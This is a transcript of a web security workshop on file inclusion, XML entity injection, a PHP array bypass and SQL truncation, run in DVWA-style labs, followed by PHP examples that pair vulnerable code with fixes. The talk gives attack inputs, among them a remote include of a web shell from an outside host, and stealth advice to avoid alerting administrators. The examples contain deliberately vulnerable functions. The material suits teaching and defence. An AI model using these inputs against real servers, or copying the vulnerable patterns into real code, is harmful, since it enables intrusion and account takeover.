All you have to do is that URL, all you have to do is that URL. Huh? No, all your exploitation can be done in that URL itself. I didn't get you, like what are you thinking? Because file one is now a file that's on the web server, correct? I'm trying to point it to a different file somewhere else, yes, and get the server to run that, exactly. How will you do it? You're exactly right: putting the URL into page=, putting the URL of a different file in the name of the file here. All you have to do, it's perfectly correct, instead of file1.php give a URL path and it'll take a remote file, include it in itself and hack the server. Did you guys get it? Okay, I'll give you an example. What I want to see... I am a Mac user so I'm going to be very Mac biased: I want to see your /etc/passwd. You know Mac machines have /etc/passwd, so instead of using a file name can you just say /etc/passwd? Will it then show the server's /etc/passwd? Right, as simple as that. It's a remote... so basically there are, like I said, two kinds of inclusion attacks that are there: one is the local file inclusion and one is called a remote file inclusion, depending on whether you can read remote. If it's a remote it's actually more dangerous. Can someone answer why it's dangerous? Sure, what kind of dangerous phase, what kind? If you really think about it, what would be the most dangerous file that... so I don't know if people have got it, let me show you how it'll work. Instead of this put /etc/... I'm going to leave that for long for you guys to see what all packages I have installed. Huh, sure, but did you get it? If you do this you should be able to see your passwd file, but on a Windows machine, for Windows users, you should be able to see your boot.ini. But this knowledge of mine is pretty old, I don't know where that boot.ini of a Windows machine is anymore. Or it can be technically any file on your file system, so you can actually say... but I'm
seeing most of you are Mac users, so... except you. Did it work for you or not? Did it work for you? Were you able to start it? Yes? Why? Did your database problem get solved and did you log into the system? Why can I see it's saying it's not able to connect to the database? Can I replace the simple connection string or does it have to be this? It has to be there, this one, because we don't want to modify their code, it will become difficult. Let's see. Sorry, is it working for you? Okay, click File Inclusion, okay, click this, let's try, if it doesn't work then I'll set it up for you. Change this, just remove file1.php, remove the whole thing, /etc/passwd, enter. File not found. Okay, we'll have to fix the php.ini for you. What it is doing is there is a control where it's not allowing you to read. I'll come to your machine and I'll fix it for you. Didn't work for you? Why? I skipped my existing website, okay, so you've not started it, you've not installed it, fine. When I come... I can't hear you. What? I don't use teaching... So probably what it is doing is the php.ini is not allowing you file includes. Okay, did it show you an error on that page? No, you already enabled it. Did it work for you? Yeah, it's able to read, right? Yeah, but I try to look for my... so it'll be able to read. My expertise on Windows is a little low, but I'll fix that, then we'll come here. But you're able to read the files, right? But only within that route, why? Why one, two, three? You should be able to read; on a Mac you should be able to read the whole system. So one, two, three correct, but there is a four which I could not read. Don't bother, you can actually read anything on the system. Remove that include.php. File not found, ah okay. One thing that you need to set is... maybe it's not set for you also, can I just see your machine? Where's your DVWA? Ah, correct, right. If you see on the left hand side there is something called DVWA Security. Set it to low. You cannot hack it with impossible. So basically this is also teaching you to protect: if it is on impossible you can read the source code, that it will never be able to be hacked. Set it to low, maybe that's the problem for you also and that's why you were able to read only in the directory. So I'm sorry, I'm sorry. First thing is open up your php.ini, search for this, allow_url_include, and set it to On. Okay, then remove this, so technically you should be... did it work? That was the problem. So I can now slash slash, or go, you can /etc... It's not infected. Okay, think about what kind of a thing you will inject in such a way that it's dangerous. Is this supposed to be correct? But you need to set this one to low, I said. And why is it not working? And let's see your file inclusion. See, you've not turned on this one: open your php.ini and change this to On. The script that downloads a shell file? What kind of a... yes, a shell file. Then you can rm -rf everything, yeah. Don't think danger, so you shouldn't do rm -rf. See, think of it like this: when you do an rm -rf... it's simpler: take a GET request, send it through exec and you have a shell through which you can execute any system commands into the system, as simple as that. Make sense? You never do an rm -rf when you're a hacker, you don't do it, the reason being if you delete it the administrator will know; you don't want administrators to know. Huh, and now we are at this one. Okay, admin, password. Did you get it? Okay, oh I'm so sorry, yes, turn on that function. Okay, hold on, let me... first things first, change your security level to low, then go to your file inclusion, change this, let's see if it works, if it doesn't then we'll go change it. Touch your passwd file. Yes, how many of you know how passwords are stored in Linux? Is it enough to just see /etc/passwd? Yes, passwords are broken up into two files in Linux, one is the /etc/passwd and the shadow. I'm not going to show you my shadow. When you get the shadow you're
still not going to break it. You will get the hashes, which you can use John the Ripper to break. But to see a shadow file you need to be root. One thing with hacking is not necessarily that the web server... so what kind of a credit... so there was a very interesting thing that you said: till now we are doing the /etc/passwd, right? What you could do is write something called a shell, a web shell, which you can download, for that matter, if it's free, or you can get it, and instead of /etc/passwd say http://prasanna.com/shell.php. As simple as that. What would happen is our program will now connect to prasanna.com, take the shell file and execute it locally, and what you have at that point of time is a capability to run commands on the server. Think to notice: the server, if it is running with the lower privilege, you only get a lower privilege, so you might be able to read a passwd file but you may not be able to read the shadow. Make sense? So that is where the next level comes in, with what we call the escalation of privileges, which is maybe something you can pick up later. There, yes, still not working? Maybe it's the php.ini file. And what did you change the security settings to, low? And still not working, then we need to see. Correct, go to file inclusion, click, click, click one of them, see on the tab, file2.php, remove it and say /etc/passwd. Remove, remove. See, it is trying to read... exist... that's also wrong. That's it, because it is reading exact files, it's reading the file and showing you the output. For you it may not be /etc/passwd, it should be a Windows file, try reading your boot.ini, don't ask me where it is stored though. Did you get any other files outside you can read? See, right, you're able to read all the files there on your own machines. You can write web shells, try executing it, but I leave it to your later date, don't do it now. You can't download, there is no point of download here, the behavior is you should be able to read files. Correct, remove that and put whatever file you want to read from the file system. I want to try this because it's in the same folder. No, don't, don't put the same folder, read something which is outside. So you can read even to the extent of C drive, okay, it can read any file on your system now. No, but you need to give a path, you'll have to give the full path, C colon. It's D, it's just in D, okay so give the whole. Okay, now it's secure? No it's not. Let's go. No, hold on, hold on, did you set this one to low, settings, DVWA settings to low? Okay maybe... no, no, go back to your page, go back to your page, remove this, just load DVWA. Where is DVWA Security... go down, see, it's impossible, set it to low, now try the same thing. I think for Windows users you cannot put a slash, I think you should put double slash, I think something like that is there: Windows does not accept one slash, you should put two slashes, all that kind of. But you've got to attack, right? You understood what the problem is? Did it work for you anywhere on this table? Okay, you have it running, you're still not able to connect your database, this is a problem. Do you want to go pair with someone and then be able to do it? Or let me show this. Oh, you saw this, right? So maybe try resetting it at home and try figuring it out, because the reason is I want to rush, I have 15 minutes to do the other stuff. Just moving along a little too fast.

The next one I don't want you guys to do, I'll show it, I'll explain what the hack is, because by doing it we are not going to... we don't have time for it now. Sorry, is it okay? The next one is an installation, I don't want them to spend too much, let them do it at home. So the other one that I wanted to talk about is a very interesting hack called XML entity injection. Have you heard about this attack? I keep hearing the same people's names, sorry. Okay, so for this one, like you installed DVWA, for the second one you have to install another tool called Mutillidae.
Please do it at your home, do it in your separate environments, whichever way you want to do it. I'm just going to show it now so that we save time. I'll give you a little bit of fundamentals behind this one first. Let's say there is an application which accepts XML. What kind of applications accept XML, developers? There was an older system... if I give out the name you will know. Access? Okay, one: SOAP. SOAP is an XML message, right? So the reason I ask you is for you to start thinking where you can hack. When you're using an application like DVWA or any of these applications, the weaponizing of the attacks doesn't come very quickly, because you think I'm just entering something and something is happening. You should start thinking how things will be in the real world. In the real world how do you get XML? For an XML entity injection to happen the web server needs to consume an XML, that's the prerequisite, start one. If that is the case you have to start thinking in what all scenarios we get XML. One of them is SOAP, and if you can create a malformed SOAP or something like that you should be able to play around. So let me give you an example. There seems to be an example here: you copy this, you paste it here, say validate XML, what happens? Don't worry about XML. If you see this kind of a behavior, what is the first kind of hack that you will think of in your mind? You're able to inject an XML and you're seeing some output on the web page. What's the attack that you can really think of quickly? What can you think of? Sure, but why HTML only? You can inject JavaScript also, right? Yeah, well, that's a good one actually, that's what I was looking for. The most obvious thing that you should be looking for is a cross-site scripting, doesn't it make sense? In this case cross-site scripting will not work, or you should do a little bit more to make it work; your default script alert script will not work here. Your homework is to figure out how to make it work. But now let's say we want to inject in such a way that I can control... we did a file inclusion, right? You could do a similar file inclusion kind of attack using entity injections. Okay, let's do this now. I forgot where I put the exploit, just give me a second please, where did I put my... What do you think is this? This is an XML. What would happen if this XML gets executed? This is all the basis to create an XML entity injection. Someone said they knew what an XML entity injection is, can you explain this XML? Anyone? Okay, I'll explain. If the parser is vulnerable, what it will do is, when it is going to build the output, it is going to do something called... it will take this entity directive that is here, execute it, and the output of that one is going to be put here. Do you see it here? The entity is called xsc and the address of the entity has been put here. Make sense? So whatever is being told to be done as an entity will be executed. The simple power: the XML parser will execute the entity, the output of it will be made a part of the XML itself. If that is the logic, think what you can do: you can effectively do anything that you did as a remote file inclusion. Okay, so let's execute this. You see the output? You can create a shell, it doesn't have to be a remote file inclusion, you can do anything that we did in the previous one using the same attack like this. You can Google and find out that there are multiple applications which are vulnerable to XML entity injections. It's not a theory, it's possible.

Okay, now I have a challenge for you people. Can I take some more time? I have a web page, so can I have your attention? So I have an application here called 1.php which takes a username and password. I was lazy enough to not write a form. This is a beautiful tool which is called HackBar which allows me to write POSTs. Unfortunately this will not become bigger, I'll show you what it is at least. On XML entity injection I rushed through it, did you guys understand what it is? That is the URL and this is the POST body. Oh
shit. You have to hack this application to get the flag. A flag is something that we play in... so like developers write code to keep their knowledge stronger, most of the hackers, we work with something called capture the flag, which basically means that we have to hack the application, get the flag and prove that we've been able to hack the system. So there is a secret flag within this application, you have to find out what the problem is. To help you, what I'm going to do is show you the source code of this one, okay, and let's see how much you can break this. How many of you are PHP developers here? Four, okay. Challenge for you... sorry, I'll forget it. Okay, a clue for you: the folder name is called array. It has been named array for a certain reason, think. Just a clue for you. The secret is in this file called foo.php which I'm not going to open. That's all it is. If you notice, include foo.php, so that means I've included that file inside the application. If you really see through this, you need to know the username and the password. How will you break this application now? Your coffee was useful. If you guys want to see within your machines, if you have pulled the repo which I have already given to you, you will have that file with you yourself. It's inside a folder called array within the security folder. Please don't open the foo.php and tell me the answer, because I will want you to tell me how you exploited it then. But I want you to read the source code and tell me how to hack this. This is a weird behavior of PHP. Think what the system is doing. You've downloaded the source code, you have, right? Okay, see this, but I've already shared the source code, you can download it. Quite a good one, that's what you should be looking at. Think what each function does, how do you break... what is the... so just to think of it, what is the operation that is being done, how do you break that operation? Correct. So in a real-world scenario if you knew the password what would be the output? The secret is to read what that function does, what's the output of that function, and only if you understand the function is when you can get this. Sorry, this doesn't need SQL, this is not a SQL thing at all, this is a very PHP thing. The secret is not here, right? It is inside the foo.php. Yeah, but you really don't need it, you can bypass it without it. Should we time box it? Has the next speaker come? Yeah, I think people definitely need it, I had coffee. Nobody had... anybody answers? You want to practise, play around with it and see. I didn't get your question. HackBar, HackBar, it's a very useful tool, it's for Firefox, allows me to do POSTs and stuff like that. Hmm, what's the challenge for you? Challenge? You're asking me what is the output? You want to get the flag basically, want to get this, this between five to six, to echo the... yes, how do you get it? So obviously we can put in as the username, so yes, strcasecmp, exactly. Give us the... okay, should I give you the answer? Do you guys want to answer or do you guys want to think for some more time? Huh, sorry? Something to do with... no, that's a different hack, not on this. No, there are multiple such gotchas within PHP itself. Okay, see, the secret of having this one is the strcasecmp: the output should be a zero. If the return type from this function is a zero it is going to consider it as acceptable. Now, if that has to happen, how do you do it? In a normal condition you cannot pull it off, but if there is an array in any of the inputs that are being passed in, it automatically sends out an output which is zero. So if you put it as an array... how do you put it as an array? You go and say password and something like this. If you convert your body... it was the one that we were working on, okay, I'll open a new one. If you make your body something like this, you got it, you see the flag come out now. PK was here, show off. Let me just open the foo file so... you got the logic, it actually goes and executes
what we wanted it to do. The trick is here, which basically means you're sending in an array. When you send an array, out of the... the way PHP works, the exit out of it is a zero, which is what we wanted in the first place. Make sense?

So the next one that I want to do is a very interesting hack. This is something that you could play around with, I have given you the files so you can set it up and you can play with it whenever you want. Unfortunately my database is not working today. I did the same presentation at DevOps Days 2015. This one per se, the exploit that I'm going to show now, has no fix. This bug was found by a gentleman called Stefan Esser, I have a lot of respect for him. This specific exploit has no... the way it works between MySQL and PHP there is no fix to this itself. Let's... so I'll show you a video now, because I can't show you an exploit I'm actually showing you the video. This is the same exploit that I had created some time back, you have the source codes with you so you can create it yourself. It's a login, it takes a user ID and a password. The target of this test is... sorry, let me tell you what I expected of you also. Huh, that's as big as it gets, that's okay. Once I finish the video I'll show you the source code, I'll run through the whole thing, explain what the problem is also. Yes, so that you get the sound, yes. So what you basically... it is similar to this one, you have to log in with the username, password. Let me give you a premise before this: you again have to log in as a username, you don't know the username, password, and you have to log in again. Hello? This is not working. Hello? Bear with me a few more minutes. So before we set this up: you cannot fix... you take the latest MySQL, latest PHP, if you write code like this it's vulnerable. It depends on both, yes, in a way it depends on the code, yes, so you have to choose how to write your passwords anyway. So the whole idea was string comparisons can be dangerous, you need to be very careful about how you do your string comparisons, that was the previous one. But this one, I'll give you the name of this hack: this hack is called SQL truncation exploit. Doesn't it make sense? Yes. So the logic of this exploit that is there is: there is an administrator within the application, you also have to become the administrator, only administrators are allowed to see some content. God... it just... hello, you just come here because you're positioning... hello, you're behind the speaker so it's okay, but we hear it, okay, I didn't know that, maybe I shouldn't touch it. Something okay, I'll continue as loud as I can. So you have to become the administrator, okay, but there is already an administrator, and if you look at the source code we're also checking the passwords, if the password is equal to the same password, so you cannot create another administrator per se. Okay, so once that is done let's look through this, I'll stop at a few places. So there is a register where you can create users. Nice, thank you so much, I'm so sorry for that, it happens in life. So you can imagine... you cannot register that... but if you have to become an administrator how do you do this? admin is already registered. Some of the known tools for SQL injection happen to be a tool called sqlmap. How many of you have heard of sqlmap? I see a few of you. It's a good tool, it's an amazing one, one of the best tools available today to bring into a SQL future of more of my own people in different ways that adds. So the reason I kept it as you are: it's very easy to use sqlmap. Just hide the view and put the view over there. So I'm running a sqlmap here just to prove that you cannot use any SQL injection tools. And so I told you, right, some of it cannot be detected with sqlmap, one of the good examples. Someone told me the font has to be made bigger. It is not injectable, so if you run these tools it would actually say hey, what's that, you're not injectable in
the SQL literature, you are seeing it. And the other tool that is generally advised is the ZAP tool. It's an amazing tool. At first you have a lot of... ZAP is a great tool. You run it through this, it does not find any SQL injection, all it finds is three issues: it says that X-Frame-Options, X-Frame-Options, if someone would know what it is, stops an attack on the X-Frame, and some of the stops, and XSS are... so it basically is like the three parameters end up with systems like this, that's it. It may not say anything about how I could become an admin or how I could do a SQL injection in this case. Now let me just go a little ahead and actually perform the attack. What I'm going to do is... please watch this, please notice what I've done. I cannot create an admin, but what did I create as user? There is a register.php which can create users, right? I've created a user with admin, 10 spaces, followed by an x, and password whatever you want. Okay, any questions till now? So I could have just... user registered. Now let me just... so if you notice I have actually created a user admin, space, 10 spaces, put the x, and then I put a password, the same, 12345. The reason why this happened was, I'll tell you the reason, it doesn't have to be the video. The reason it happened is truncation. The varchar: when the user was created, the table had 10, varchar, user varchar 10. What did I do? I said user, 10 spaces and an x, correct? So if it is varchar 10... or it's not technically 10, it's I think 15 or 20, so or exact, you need to think on what is the exact number. What would happen is, the way it behaves is... so let's say if you are five... in this case user is u-s-e-r, 4, plus 10, 14, plus 1, 15. So I sent 15 characters, right, totally. Let's say the varchar value is only 14. The way MySQL behaves is it removes the last and stores what it can. So what it does is store, in this case, admin, 10 spaces. That's why it's called a truncation bug: it removed the x, and when you do a select statement and say give me select * from users for admin, the way MySQL works is admin is equal to admin space, it does not bother, it doesn't care. So what then what it did... so if my login sequence is like hey, give me all users where admin and password equal to whatever is there, it will come back as a record set, and generally the way we work is if the number of records is more than one you basically give a login through. You got the problem here? Any questions on this one? So this is where it's called a truncation attack. You have to figure out how much is the length of that database field, put one extra more than that, you give it spaces and give the last one as something that you know will get destroyed. Yes, exactly, I wrote the code so I know it exactly, otherwise you have to try, there is no way around this: find out what is the amount of varchar space on that. This makes sense? Did this attack... this is actually not solvable if you write... so what do you think, as... you've been developers here, what is the fix for this problem? Sorry? And here, not really, there could be a much easier way of doing it. No, there's actually one SQL thing that is very useful, there's something in SQL which helps you do this. Well, you could not write it immediately to the database, you could, you know, like you said, trim it before, yeah, but what if you just set a unique constraint, as simple as that. Ensure that whenever you pull out data you have a unique constraint, that's it, this will never happen. Constraint: so the way it then works, when you're setting it itself it'll say okay, I have a value already which is admin, okay, and it will not allow you to save the data inside, as simple as that, that solves the problem. Sorry, you had a question? I can't hear, I'll come. Sorry, which is where the problem is, you should think the way... the easy way to solve it is, yeah, constraint, unique constraint. Yes, you had a
question. You will not remove it. See, the problem is not with the space at all. So the way it works is when you put admin, 10 spaces, and you put an x, and your total varchar available is only 14, this is 15 characters, right? Right, so it will drop the one character at the last and it'll store only 14. So when it... I'll show you the source code now. So what is actually technically happening: one user admin is already existing, but now the next record is admin, 10 spaces. But when you're doing a select query there is no difference between an admin and an admin space, that's why you can basically break it. So when you say select * from login where user = admin and password = whatever the user puts, both the records will come, because the way PHP thinks, admin and admin space are the same things. Make sense? Let me just, before we go, I'll show you the source code because it's fun to... so the fun is in register.php. Is it enough, are you able to see it clearly? Okay, so I'm taking a username, password. First thing I'm checking is if the user admin is existing or not; it clearly throws out the user saying, if you try admin again you cannot log in. Next, if the password is equal to something that the user has already entered, it does not... but let's say that's not a control. Look what I am doing: MySQL insert into user (user, password). Okay, the way I created it is the user field was varchar 14, so when I enter 15 it will only store 14, it will not store 15. Okay, as simple as this. But now let's say you open this and see how login works: user = ... I've hard-coded it to be supposed to be admin, still I'm able to log in as admin space, right? If you see the video, it said welcome, you're an administrator. The reason being is like this, see the output I wanted. How did I check? Once I get the output, if the record set is more than zero... it will be more than zero because it will, for admin... and I have created admin space with the password one two three four five. It's a valid record, it will be sent back, that record, and I have basically logged in. Yes, any system, this is the way PHP works, you'll have to work around this one. So think about putting a unique constraint around it or trim, all that is definitely a possibility. How you do it is totally up to you. You could read about this; this specific one is called a SQL truncation attack. I wanted to do something more but we can keep it to a later date. Let's call it, it's already more than my time allowed. Thank you so much, if you have any questions please do ask.
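The file inclusion section above shows a `page=` parameter fed straight to `include`. As an added example (not DVWA's code and not the speaker's), here is that pattern next to an allowlisted version in which the request value is only a key into a fixed map; the `PAGES` map, the file names and the sample inputs are constructed for the demo.

```php
<?php
// Added example, not DVWA's own code: the include() pattern the talk
// steers to /etc/passwd or a remote shell.php, next to an allowlisted
// version. PAGES, the file names and the inputs are constructed.

// Vulnerable form: whatever arrives in ?page= is handed to include().
// With allow_url_include=On this is remote file inclusion; with it Off
// it is still local file inclusion of any path the web user can read.
function include_page_vulnerable(string $page): void
{
    include $page;                         // e.g. page=/etc/passwd
}

// Hardened form: the request value is only a key into a fixed map, so
// the user never supplies a path and traversal, URLs and stream
// wrappers have nothing to act on.
const PAGES = [
    'file1' => __DIR__ . '/file1.php',
    'file2' => __DIR__ . '/file2.php',
    'file3' => __DIR__ . '/file3.php',
];

// Returns the on-disk path for a known key, null for anything else.
// The is_string() check also rejects page[]=... (an array from $_GET).
function resolve_page($page): ?string
{
    if (!is_string($page) || !array_key_exists($page, PAGES)) {
        return null;                       // unknown key: refuse, never guess
    }
    return PAGES[$page];
}

function include_page_hardened($page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        echo 'page not found';
        return;
    }
    include $path;
}

// Constructed inputs: the legitimate key plus the payloads from the talk.
$attempts = [
    'file1',
    '/etc/passwd',
    'http://prasanna.com/shell.php',
    '../../config/config.inc.php',
    ['file1'],                             // page[]=file1
];
foreach ($attempts as $a) {
    $label = is_array($a) ? 'page[]=file1' : $a;
    printf("%-32s -> %s\n", $label, resolve_page($a) ?? 'rejected');
}
```

Only the first input resolves to a path; every other line prints `rejected`, which is the whole point of mapping keys rather than passing paths.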
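The "array" challenge above rests on `strcasecmp()` returning something that compares equal to zero when it is handed an array. This added example (not the workshop's `1.php` or `foo.php`; the secret, the request bodies and the function names are constructed) shows the loose check, the POST body that satisfies it on PHP 5 and 7, and two checks that do not have the problem.

```php
<?php
// Added example, not the workshop's 1.php/foo.php: the strcasecmp()
// check the "array" challenge is built on, the request body that
// satisfies it, and checks that do not. SECRET_PASSWORD is constructed.

const SECRET_PASSWORD = 's3cr3t-flag-gate';

// The check as the challenge has it. strcasecmp() returns 0 for a
// case-insensitive match. On PHP 5 and 7 an array argument produces a
// warning and a NULL return, and NULL == 0 is true under loose
// comparison, so password[]=anything passes. PHP 8 throws a TypeError
// for the array instead (a crash, not a bypass); it is caught here so
// the demo runs on either major version.
function login_vulnerable($password): bool
{
    try {
        return @strcasecmp($password, SECRET_PASSWORD) == 0;
    } catch (TypeError $e) {
        return false;
    }
}

// Minimal fix: require a string and compare strictly against 0, so a
// non-integer return can never look like "equal".
function login_minimal_fix($password): bool
{
    return is_string($password) && strcasecmp($password, SECRET_PASSWORD) === 0;
}

// Preferred form: string type check plus hash_equals(), which is
// constant-time and returns a real bool. The case-insensitive match is
// dropped on purpose; it only widens what is accepted as the secret.
function login_hardened($password): bool
{
    return is_string($password) && hash_equals(SECRET_PASSWORD, $password);
}

// Constructed POST bodies: a wrong guess, the right secret, and the
// array form the talk sends from HackBar. parse_str() applies the same
// parsing PHP uses to build $_POST, so password[]=x becomes ['x'].
function run_demo(): array
{
    $bodies = [
        'username=admin&password=guess',
        'username=admin&password=' . SECRET_PASSWORD,
        'username=admin&password[]=guess',
    ];
    $results = [];
    foreach ($bodies as $body) {
        parse_str($body, $post);
        $results[$body] = [
            'vulnerable' => login_vulnerable($post['password']),
            'minimal'    => login_minimal_fix($post['password']),
            'hardened'   => login_hardened($post['password']),
        ];
    }
    return $results;
}

foreach (run_demo() as $body => $r) {
    printf("%-44s vulnerable=%-5s minimal=%-5s hardened=%s\n", $body,
        var_export($r['vulnerable'], true), var_export($r['minimal'], true),
        var_export($r['hardened'], true));
}
```

On PHP 7 the third body reports `vulnerable=true` while both fixed checks report `false`; on PHP 8 all three columns are `false` for that body because the array never reaches the comparison.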
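The SQL truncation walk-through above describes a `VARCHAR(14)` user column, an INSERT that silently loses the 15th character, and a login query for which `'admin'` and `'admin'` followed by spaces are the same value. This added example (not the workshop's `register.php` or `login.php`) reproduces that path against MySQL through PDO and puts the unique-constraint fix the audience arrived at beside it, with strict `sql_mode` and an application-side length check; the DSN, credentials, table name and admin secret are placeholders, and it needs a scratch database it may drop tables in.

```php
<?php
// Added example, not the workshop's register.php/login.php: the
// truncation path and a hardened registration/login side by side,
// against MySQL through PDO. DSN, credentials and secrets are placeholders.

$pdo = new PDO('mysql:host=127.0.0.1;dbname=truncdemo', 'demo', 'demo-password', [
    PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
]);

// Schema as the talk describes it: VARCHAR(14), no UNIQUE. sql_mode is
// cleared because MySQL 5.7+ defaults to strict mode, where the
// over-long INSERT already fails; non-strict silently cuts it to 14.
// utf8mb4_general_ci is a PAD SPACE collation, so 'admin' and 'admin'
// plus trailing spaces compare equal (MySQL 8's utf8mb4_0900_ai_ci is NO PAD).
function create_vulnerable_schema(PDO $pdo): void
{
    $pdo->exec("SET SESSION sql_mode = ''");
    $pdo->exec('DROP TABLE IF EXISTS users');
    $pdo->exec('CREATE TABLE users (user VARCHAR(14), password VARCHAR(255))
                CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci');
}

// Strict mode turns truncation into error 1406 (data too long); the
// UNIQUE index rejects a second 'admin' that differs only by trailing
// spaces or case, because the index compares under the same collation
// rules as the WHERE clause.
function create_hardened_schema(PDO $pdo): void
{
    $pdo->exec("SET SESSION sql_mode = 'STRICT_ALL_TABLES'");
    $pdo->exec('DROP TABLE IF EXISTS users');
    $pdo->exec('CREATE TABLE users (user VARCHAR(14) NOT NULL,
                password VARCHAR(255) NOT NULL, UNIQUE KEY uq_user (user))
                CHARACTER SET utf8mb4 COLLATE utf8mb4_general_ci');
}

function seed_admin(PDO $pdo): void
{
    $pdo->prepare('INSERT INTO users (user, password) VALUES (?, ?)')
        ->execute(['admin', password_hash('real-admin-secret', PASSWORD_DEFAULT)]);
}

// register.php as the talk has it: refuses only the exact string 'admin'.
function register_vulnerable(PDO $pdo, string $user, string $password): bool
{
    if ($user === 'admin') {
        return false;
    }
    $pdo->prepare('INSERT INTO users (user, password) VALUES (?, ?)')
        ->execute([$user, password_hash($password, PASSWORD_DEFAULT)]);
    return true;
}

// Hardened: reject padded or over-long names before they reach the
// database, and treat a duplicate-key error (1062) as "name taken".
function register_hardened(PDO $pdo, string $user, string $password): bool
{
    if ($user === '' || $user !== trim($user) || mb_strlen($user) > 14) {
        return false;
    }
    try {
        $pdo->prepare('INSERT INTO users (user, password) VALUES (?, ?)')
            ->execute([$user, password_hash($password, PASSWORD_DEFAULT)]);
    } catch (PDOException $e) {
        if (($e->errorInfo[1] ?? null) === 1062) {
            return false;
        }
        throw $e;
    }
    return true;
}

// Login that does not trust the WHERE clause alone: exactly one row, its
// stored name byte-identical to the supplied one, then password_verify().
function login(PDO $pdo, string $user, string $password): bool
{
    $stmt = $pdo->prepare('SELECT user, password FROM users WHERE user = ?');
    $stmt->execute([$user]);
    $rows = $stmt->fetchAll(PDO::FETCH_ASSOC);
    if (count($rows) !== 1 || $rows[0]['user'] !== $user) {
        return false;
    }
    return password_verify($password, $rows[0]['password']);
}

// 'admin' + 10 spaces + 'x' is 16 characters; the vulnerable schema
// keeps the first 14, i.e. 'admin' followed by 9 spaces, and drops the x.
$lookalike = 'admin' . str_repeat(' ', 10) . 'x';

create_vulnerable_schema($pdo);
seed_admin($pdo);
register_vulnerable($pdo, $lookalike, '12345');                      // accepted
$n = $pdo->query("SELECT COUNT(*) FROM users WHERE user = 'admin'")->fetchColumn();
echo "vulnerable schema: rows matching user='admin' = $n\n";          // 2

create_hardened_schema($pdo);
seed_admin($pdo);
var_dump(register_hardened($pdo, $lookalike, '12345'));               // false: length check
var_dump(register_hardened($pdo, 'Admin', '12345'));                  // false: UNIQUE, error 1062
var_dump(login($pdo, 'admin', '12345'));                              // false: one row, wrong password
```

The count of 2 under the vulnerable schema is the talk's "both records will come"; under the hardened schema the look-alike never gets a row, so the login query can only ever return the real administrator.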